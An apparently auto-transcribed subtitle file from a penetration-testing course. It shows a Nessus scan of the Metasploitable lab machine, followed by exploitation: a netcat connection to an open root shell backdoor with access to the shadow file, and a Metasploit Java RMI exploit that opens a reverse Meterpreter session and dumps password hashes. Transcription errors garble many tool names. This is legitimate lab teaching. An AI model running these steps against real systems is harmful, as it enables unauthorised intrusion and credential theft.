1
00:00:00,360 --> 00:00:02,740
‫So the scan is completed in 17 minutes.

2
00:00:03,390 --> 00:00:08,940
‫Now, another pause here, because I disable the windows plug ins, it seems as if the Windows systems

3
00:00:08,940 --> 00:00:10,640
‫don't have critical vulnerabilities.

4
00:00:10,980 --> 00:00:15,960
‫It's not right, especially my Windows XP has several critical vulnerabilities.

5
00:00:16,530 --> 00:00:21,930
‫If you didn't disable windows plug ins, you're supposed to see some more vulnerabilities for Windows

6
00:00:21,930 --> 00:00:22,440
‫systems.

7
00:00:23,720 --> 00:00:30,680
‫Now to see the results of the voidable scan in detail, let's click the Métis Voidable results to 06.

8
00:00:32,020 --> 00:00:39,100
‫The Nessa's home found 10 critical vulnerabilities with their scan configuration, but please note that

9
00:00:39,100 --> 00:00:46,000
‫the configuration affects the results so the target systems may have more vulnerabilities than reported.

10
00:00:47,740 --> 00:00:54,100
‫If there is a vulnerability and it's not found in a scan, we call it a false negative.

11
00:00:55,230 --> 00:01:01,400
‫I'm sure you know that the critical vulnerabilities are the most dangerous ones, but that's where it

12
00:01:01,400 --> 00:01:02,040
‫gets good.

13
00:01:02,060 --> 00:01:04,450
‫They are the most exploitable ones in general.

14
00:01:05,180 --> 00:01:11,240
‫So let's click on one of these critical vulnerabilities, for example, being shown back door detection.

15
00:01:12,670 --> 00:01:18,280
‫Well, look at the description, it says a shell is listening on the port without any authentication

16
00:01:18,280 --> 00:01:19,060
‫being required.

17
00:01:19,750 --> 00:01:21,880
‫This is obviously a back door.

18
00:01:23,020 --> 00:01:25,030
‫Your support number of 15 24.

19
00:01:25,540 --> 00:01:31,270
‫Now let's check of the finding is a true positive go to terminal screen.

20
00:01:31,850 --> 00:01:40,810
‫I used Ngarkat tool to connect simply type ency and the target IP and the target bought 15 24 and we're

21
00:01:40,810 --> 00:01:41,020
‫in.

22
00:01:42,430 --> 00:01:44,230
‫We have the shell for Métis voidable.

23
00:01:45,670 --> 00:01:54,130
‫Type, who am I to learn the credential we have, we are the user now, it was too simple, it's just

24
00:01:54,130 --> 00:01:54,880
‫not fun.

25
00:01:54,880 --> 00:01:56,620
‫And, you know, I don't like it.

26
00:01:56,620 --> 00:01:57,610
‫I like a good challenge.

27
00:01:57,610 --> 00:01:57,920
‫Right.

28
00:01:58,330 --> 00:02:03,010
‫I mean, we are the route user and we can access anything we want.

29
00:02:03,010 --> 00:02:07,420
‫For example, shadow file, which contains the hashes of the user's passwords.

30
00:02:14,510 --> 00:02:21,830
‫OK, back to the browser and click on the back to vulnerability's link to turn back to the vulnerabilities

31
00:02:21,830 --> 00:02:22,640
‫of Métis voidable.

32
00:02:23,750 --> 00:02:25,310
‫Now, I'd like to show you some more.

33
00:02:26,690 --> 00:02:33,710
‫Scroll on down the vulnerability, it shows 50 vulnerabilities per page by default, but let's make

34
00:02:33,710 --> 00:02:36,350
‫it 200 to see all the findings in a single page.

35
00:02:37,980 --> 00:02:43,320
‫Now, the findings are ordered by SAVARY levels, so information is at the bottom.

36
00:02:44,290 --> 00:02:50,470
‫Findings with the severity level of information identify non vulnerability information, which is,

37
00:02:50,470 --> 00:02:55,260
‫you know, nice to know, and it keeps it separate from the vulnerability detail.

38
00:02:57,070 --> 00:03:01,990
‫So here there's an info RMI registry detection, let's click it.

39
00:03:02,880 --> 00:03:08,700
‫It says that the remote host is running an RMI registry, retrieving remote objects in the Java runtime

40
00:03:08,700 --> 00:03:10,300
‫method invocation system.

41
00:03:11,370 --> 00:03:17,220
‫So let's look for the exploits of the Métis Floyd framework if there is any exploit for Java RMI.

42
00:03:38,710 --> 00:03:42,160
‫Opening terminal screen and run MSF console.

43
00:03:49,990 --> 00:03:55,180
‫So here we have MSF console, let's search the exploits of RMI.

44
00:04:09,150 --> 00:04:10,190
‫Too many results.

45
00:04:11,750 --> 00:04:15,650
‫To keep it more specific, I want to search Java RMI.

46
00:04:22,310 --> 00:04:30,470
‫So we have to auxiliaries and to exploits at this time, so look at the exploit in the last line, this

47
00:04:30,470 --> 00:04:37,100
‫module takes advantage of the default configuration of the RMI registry and RMI activation services,

48
00:04:37,520 --> 00:04:39,950
‫which allow loading classes from any remote.

49
00:04:39,950 --> 00:04:40,640
‫You, Earl.

50
00:04:41,800 --> 00:04:44,020
‫Let's try to use it on our RMI poor.

51
00:04:45,340 --> 00:04:49,570
‫Please don't worry, I am going to explain what these all mean.

52
00:04:49,750 --> 00:04:53,050
‫I just want to show you an example at the beginning.

53
00:04:53,440 --> 00:04:54,220
‫So bear with me.

54
00:04:54,790 --> 00:04:57,760
‫I use the module name with the full path.

55
00:04:58,580 --> 00:05:04,090
‫You can simply select the module name and click the middle button of the mouse to copy and paste it.

56
00:05:05,400 --> 00:05:10,470
‫Type show payloads to see the payloads can be used with this module.

57
00:05:12,130 --> 00:05:15,050
‫So I want to use this payload to have an interpreter session.

58
00:05:15,110 --> 00:05:20,020
‫Again, don't worry, I'll explain what the interpreter is soon, but just copy and paste the payload

59
00:05:20,020 --> 00:05:25,920
‫name type show options to see the parameters of the exploit and the payload as well.

60
00:05:27,010 --> 00:05:34,660
‫Set the remote host as Métis voidable two zero six default remote port is the same with our port one

61
00:05:34,660 --> 00:05:35,560
‫zero nine nine.

62
00:05:36,550 --> 00:05:44,500
‫Servoz is the local host to listen on, set this to be our colleague to to to.

63
00:05:45,500 --> 00:05:47,420
‫By default, support remain.

64
00:05:49,180 --> 00:05:51,310
‫So the other options are not required.

65
00:05:51,340 --> 00:05:52,450
‫I'll just leave it blank.

66
00:05:53,850 --> 00:06:01,200
‫Now, are the payload options set the listen host to be our colleague to to to default?

67
00:06:01,200 --> 00:06:07,590
‫Listen, port is good for four, four and finally type exploit to run the exploit.

68
00:06:15,060 --> 00:06:18,210
‫So there it looks like we have a better picture session.

69
00:06:19,250 --> 00:06:26,720
‫Type sessions dash l to list the active sessions, be patient, we'll see them in detail type session

70
00:06:27,060 --> 00:06:34,070
‫dashi session ID to interact with a session and here we are, we're in now.

71
00:06:34,070 --> 00:06:38,380
‫I'm going to show you what we can do with an interpreter session in the following chapter.

72
00:06:38,690 --> 00:06:44,180
‫But here's a couple of Mettenberger commands disinfo info to see the system information.

73
00:06:48,050 --> 00:06:50,660
‫Hash dump the gather password hashes.

74
00:06:51,560 --> 00:06:58,970
‫Now, no such command for this system, thankfully, we have an alternative for this type run post Linux

75
00:06:59,420 --> 00:07:05,060
‫gathers hash, dump and hit, enter and collect the fruits of your labor.

76
00:07:06,210 --> 00:07:12,890
‫So as you see here, we found another way to exploit the system, even though the finding was just information.

77
00:07:13,710 --> 00:07:17,430
‫So I hope you understand not to underestimate any finding.